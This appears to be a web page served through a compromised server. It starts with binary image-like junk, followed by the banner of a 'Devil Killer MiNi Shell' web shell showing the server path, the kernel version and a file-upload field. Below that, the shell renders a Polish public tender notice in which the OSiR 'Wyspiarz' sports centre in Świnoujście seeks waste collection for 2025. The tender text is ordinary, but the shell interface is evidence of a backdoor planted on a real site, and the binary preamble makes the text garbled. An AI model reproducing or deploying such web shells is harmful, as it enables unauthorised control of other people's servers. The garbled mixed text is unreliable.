JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241105/0057806101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie odbioru i wywozu odpadów<br/> komunalnych,opakowaniowych,budowlanych,płynnych,niebezpiecznych 1302 06*,150110*,odbiór zużytychtonerów,opon,baterii,elektrosprzętu w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK SPORTU I REKREACJI &#34;WYSPIARZ&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000330944</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Matejki 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świnoujście</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">913213781</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">913213781</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@osir.swinoujscie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.osir.swinoujscie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie odbioru i wywozu odpadów<br/> komunalnych,opakowaniowych,budowlanych,płynnych,niebezpiecznych 1302 06*,150110*,odbiór zużytychtonerów,opon,baterii,elektrosprzętu w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-189f90db-4190-4a67-b050-367ec434f3f6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00578061</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00028351/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Odbiór i wywóz odpadów komunalnych w roku 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/osir.swinoujscie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Zasady komunikacji elektronicznej zostały, z uwagi na ograniczoną ilość znaków w niniejszym ogłoszeniu o zamówieniu szczegółowo opisane w specyfikacji warunków zamówienia; 2) ofertę wraz z załącznikami<br/> należy złożyć wyłącznie za pośrednictwem „Formularza”, dostępnego na Platformie Zakupowej, w miejscu publikacji ogłoszenia o<br/> zamówieniu i innych dokumentów zamówienia; oferta wraz z załącznikami złożona za pośrednictwem formularza wiadomości, albo<br/> na adres poczty elektronicznej zostanie odrzucona jako niezgodna z ustawą pzp; 3) Adres strony internetowej: https://platformazakupowa.pl/pn/osir.swinoujscie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) ofertę i oświadczenia, o którym<br/> mowa w art. 125 ust. 1 ustawy pzp, a także inne dokumenty składane wraz z ofertą przygotowuje się i składa się, pod rygorem<br/> nieważności w formie elektronicznej (tj. przy użyciu walifikowanego podpisu elektronicznego) lub w postaci elektronicznej,opatrzonej<br/> podpisem zaufanym lub podpisanej przy pomocy dowodu osobistego z warstwą elektroniczną (tzw. podpisem osobistym); 2) w celu<br/> złożenia oferty Wykonawca może, ale nie musi założyć konto na Platformie Zakupowej. Instrukcja dotycząca rejestracji i logowania<br/> dostępna jest pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje; 3) przeglądanie i pobieranie publicznej treści<br/> dokumentacji postępowania nie wymaga posiadania konta na Platformie Zakupowej, ani logowania; 4) korzystanie z platformy<br/> zakupowej przez wykonawców jest bezpłatne; 5) za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się<br/> datę zapisania plików na serwerze. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych Pana/Pani danych osobowych jest Ośrodek Sportu i Rekreacji<br/> „Wyspiarz” w Świnoujściu, z siedzibą przy ul. Matejki 22, 72-600 Świnoujście, reprezentowany przez Dyrektora adres email:<br/> sekretariat@osir.swinoujscie.pl , zwany dalej Ośrodkiem 2. Inspektorem danych osobowych w Ośrodku Sportu i Rekreacji<br/> „Wyspiarz” w Świnoujściu jest Pani Joanna Kozłowska, adres e mail: abi@osir.swinoujscie.pl<br/> 3. Cel Przetwarzania danych - Pana/Pani dane osobowe będą przetwarzane przez Ośrodek w celach związanych z wykonywaniem<br/> zadań statutowych Ośrodka, a w szczególności w związku z realizacją zadań gospodarowania nieruchomościami posiadanymi przez<br/> Ośrodek – dane osobowe oferentów (podstawa prawna: art. 6 ust. 1 lit. b, c RODO w związku z ustawą z dnia 29.01.2004r. Prawo<br/> zamówień publicznych; ustawą z dnia 23.04.1964r. Kodeks cywilny; ustawą z dnia 27.08.2009r. O finansach publicznych;, ustawą z<br/> dnia 06.09.2001r. O dostępie do informacji publicznej, a także ustawą z dnia 14.07.1983r. O narodowym zasobie archiwalnym i<br/> archiwach). 4. Okres przetwarzania danych osobowych- dane osobowe będą przetwarzane przez okres wymagany przepisami<br/> prawa w zakresie przechowywania dokumentacji konkursowej/ przetargowej, księgowej i podatkowej lub przez okres przedawnienia<br/> roszczeń z umowy i tak: 1) 4 lata, licząc od końca roku w którym uzyskano dane- w zakresie danych oferentów, których oferty nie<br/> zostały wybrane, 2) w przypadku wyboru oferty i zawarcia umowy dane osobowe związane z realizacją umowy będą<br/> przechowywane przez okres do<br/> przedawnienia roszczeń, licząc od końca roku w którym nastąpiło wygaśnięcie umowy lub w którym upłynął termin zobowiązania<br/> podatkowego, nie krócej jednakże niż okres, o którym mowa w pkt 1).<br/> 5. Udostępnianie danych - dane osobowe mogą być udostępniane:<br/> 1) pracownikom i współpracownikom Ośrodka na podstawie nadanych upoważnień, innym podmiotom lub organom upoważnionym<br/> na podstawie przepisów prawa, a także na podstawie umów powierzenia, w szczególności w przypadku wyboru oferty dane<br/> przekazywane mogą być dostawcom systemów informatycznych i usług IT, podmiotom świadczącym usługi prawnicze, urzędom<br/> skarbowym, bankom, ubezpieczycielom i innym instytucjom uprawnionych z mocy obowiązujących przepisów prawa w tym<br/> instytucjom upoważnionym do kontroli i rozliczenia środków pozyskanych w ramach funduszy unijnych, 2) Ministrowi Cyfryzacji w<br/> celu realizacji obowiązku prawnego, o którym mowa w art. 9 ust. 4 pkt 3) oraz art. 9 ust. 4a ustawy o dostępie do informacji<br/> publicznej (dot. informacji umieszczanych na BIP) i innym podmiotom kierującym zapytania w świetle art. 2<br/> ust.1 o udzielnie informacji publicznej ww. ustawy. 3) Administrator nie zamierza przekazać danych osobowych do państwa trzeciego<br/> lub organizacji międzynarodowej. 4) Administrator nie podejmuje decyzji w sposób zautomatyzowany w tym profilowanie w oparciu o<br/> Pana/Pani dane osobowe.<br/> 6. Zgodnie z przepisami RODO, przysługuje Panu/Pani prawo do: 1) dostępu do swoich danych oraz otrzymania ich kopii; 2) sprostowania (poprawiania) swoich danych; 3) żądania usunięcia swoich danych osobowych, gdy nie ma innej podstawy prawnej<br/> przetwarzania; 4) prawo do wniesienia sprzeciwu wobec przetwarzania swoich danych, ze względu na Pana/Pani szczególną<br/> sytuację, w przypadkach, kiedy przetwarzamy Pana/Pani dane na podstawie prawnie usprawiedliwionego interesu Ośrodka; 5)<br/> przenoszenia danych,<br/> 6) wniesienia skargi do organu nadzorczego do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że<br/> przetwarzanie przez Ośrodek danych osobowych narusza przepisy prawa o ochronie danych osobowych.<br/> 7. Informacja o wymogu/dobrowolności podania danych Podanie danych osobowych jest dobrowolne lecz niezbędne w celach<br/> związanych z przystąpieniem do przetargu / konkursu, zawarciem umowy i jej realizacji. Konsekwencje niepodania określonych<br/> danych mogą wynikać z ustawy Prawo zamówień publicznych lub mogą skutkować brakiem możliwości rozpatrzenia oferty.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia<br/> Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/> przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/> rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), zwanego dalej &#34;RODO&#34;, w celu<br/> umożliwienia korzystania za środków ochrony prawnej, o których mowa w ustawie, do upływu terminu na ich wniesienie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSIR/ZP/03/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie odbioru i wywozu odpadów komunalnych, odpadów opakowaniowych, odpadów budowlanych, odpadów płynnych, odpadów niebezpiecznych o kodach 13 02 06*, 15 01 10* oraz odbiór zużytych tonerów, opon, baterii, elektrosprzętu z obiektów Ośrodka Sportu i Rekreacji „Wyspiarz” w roku 2025. <br/>2. Szczegółowy opis przedmiotu zamówienia, wykaz i szacunkowa ilość przedmiotu zamówienia został zawarty w<br/> załączniku nr 1 i 2 do SWZ tj. Opis przedmiotu zamówienia i wykaz obiektów objętych zamówieniem, Szacunkowa ilość przedmiotu zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513200-8 - Usługi wywozu stałych odpadów miejskich</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zgodnie z art. 441 ust. 1 ustawy pzp, zastrzega sobie możliwość skorzystania z prawa opcji. Realizacja prawa<br/> opcji polegać będzie na rozszerzeniu usług będących przedmiotem umowy na nowo pozyskane obiekty Zamawiającego<br/> i/lub rozszerzenie częstotliwości świadczonych usług, nie więcej niż o 30% wartości zamówienia podstawowego (30 %<br/> maksymalnego wynagrodzenia Wykonawcy, o którym mowa w § 4 ust. 1 wzoru umowy). Prawo opcji realizowane będzie na<br/> takich samych warunkach jak zamówienie podstawowe, cena jednostkowa dotycząca jednostkowej usługi w przypadku<br/> skorzystania z prawa opcji będzie taka, jak cena określona w zamówieniu. O zamiarze i zakresie skorzystania z prawa opcji,<br/> Zamawiający poinformuje Wykonawcę odrębnym pismem/oświadczeniem, złożonym na piśmie lub za pośrednictwem<br/> poczty elektronicznej. Zamawiający będzie mógł skorzystać z prawa opcji w sytuacji, gdy zostaną mu oddane do<br/> korzystania/zarządzania nowe obiekty lub, gdy konieczne będzie zwiększenie częstotliwości świadczonych usług.<br/> Zwiększenie zamówienia w ramach prawa opcji może dotyczyć każdego rodzaju świadczeń określonych w opisie<br/> przedmiotu zamówienia załącznik nr 1 i 2 do SWZ. Rozszerzenie zamówienia w ramach opcji będzie realizowane od dnia<br/> zgłoszenia Wykonawcy do dnia wskazanego w oświadczeniu dotyczącym skorzystania z prawa opcji, jednakże nie dłużej niż do końca obowiązywania niniejszej umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni oferty przyznając w każdym kryterium punkty. Za najkorzystniejszą zostanie<br/> uznana oferta, która uzyska najwięcej punktów obliczonych w oparciu o ustalone kryteria według wzoru C+ AŚ+T i przyjętą metodę<br/> oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy &#34;AŚ&#34;-norma emisji spalin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności &#34;T&#34;</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3. O udzielenie zamówienia może się ubiegać wykonawca, który spełnia warunki udziału w postępowaniu dotyczące:1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów tj. posiadania odpowiedniego zezwolenia i wpisu do rejestru działalności regulowanej: a) posiada aktualny wpis do rejestru działalności regulowanej, o którym mowa w art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach, w zakresie objętym przedmiotem zamówienia,b) kopia aktualnego zezwolenia na prowadzenie działalności polegającej na zbieraniu odpadów komunalnych będących przedmiotem postępowania, wydane przez właściwy organ administracji publicznej, obowiązujące zgodnie z art. 41 ustawy z dnia 14 grudnia 2012 r. odpadach (Dz.U. z 2020 r. poz. 797 z poźn.zm),b) zaświadczenie o wpisie do rejestru BDO-Baza danych o produktach i opakowaniach, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2019 r. poz. 701 ze zm.) wraz z podaniem nadanego numeru rejestrowego.<br/>2) zdolności technicznej lub zawodowej: b) wykonał lub wykonuje należycie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej jedno zamówienie/ umowę, której zakres odpowiada przedmiotowi zamówienia, tj. polega na świadczeniu usług odbioru i wywozu odpadów komunalnych. Zamawiający wymaga, aby wartość zamówienia/umowy wykazanych na okoliczność spełniania warunku była równa lub przekraczająca 200.000,00 zł brutto. Dla uznania warunku udziału w postępowaniu za spełniony wykonawca może wykazać umowę, która jest w toku (nie została jeszcze zakończona), a w ramach której została wykonana usługa o wymaganej wartości, na dzień składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie na podstawie<br/> art. 125 ust. 1 ustawy pzp, traktujące o braku podstaw do wykluczenia wykonawcy z postępowania, według wzoru przekazanego<br/> przez zamawiającego. Informacje zawarte w ww. oświadczeniu stanowią wstępne potwierdzenie, że wykonawca nie podlega<br/> wykluczeniu z postępowania. Uwaga! w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. dokument<br/> składa każdy z wykonawców w zakresie braku podstaw do wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie na podstawie art. 125 ust. 1 ustawy pzp, traktujące o spełnianiu warunków udziału w postępowaniu, według wzoru<br/> przekazanego przez zamawiającego. Informacje zawarte w ww. oświadczeniu stanowią wstępne potwierdzenie, że wykonawca<br/> spełnia warunki udziału w postępowaniu. Uwaga! w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww.<br/> dokument składa każdy z wykonawców w zakresie, w jakim wykazuje spełnianie warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz oferty, według wzoru udostępnionego przez zamawiającego;<br/> 2) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: wykonawcy,<br/> podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu<br/> (odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie<br/> zamówienia) działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów rejestrowych (KRS, CEiIDG);<br/> 3) odpis lub Informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/> innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub wykonawców jest<br/> umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów rejestrowych, jeżeli<br/> zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskaże dane<br/> umożliwiające dostęp do tych dokumentów (NIP, Regon, nr KRS); 4) oświadczenie na podstawie art. 117 ust. 4<br/> wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które dostawy wykonają poszczególni<br/> wykonawcy, według wzoru przekazanego przez zamawiającego w treści formularza ofertowego). Dokument należy złożyć w<br/> przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia.<br/> 5) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/> potrzeby realizacji danego zamówienia. Zobowiązanie podmiotu udostępniającego zasoby może być zastąpione innym<br/> podmiotowym środkiem dowodowym potwierdzającym, że wykonawca realizując zamówienie, będzie dysponował<br/> niezbędnymi zasobami tego podmiotu. Uwaga! Ww. zobowiązanie należy złożyć tylko wtedy, gdy wykonawca polega na<br/> zdolnościach lub sytuacji 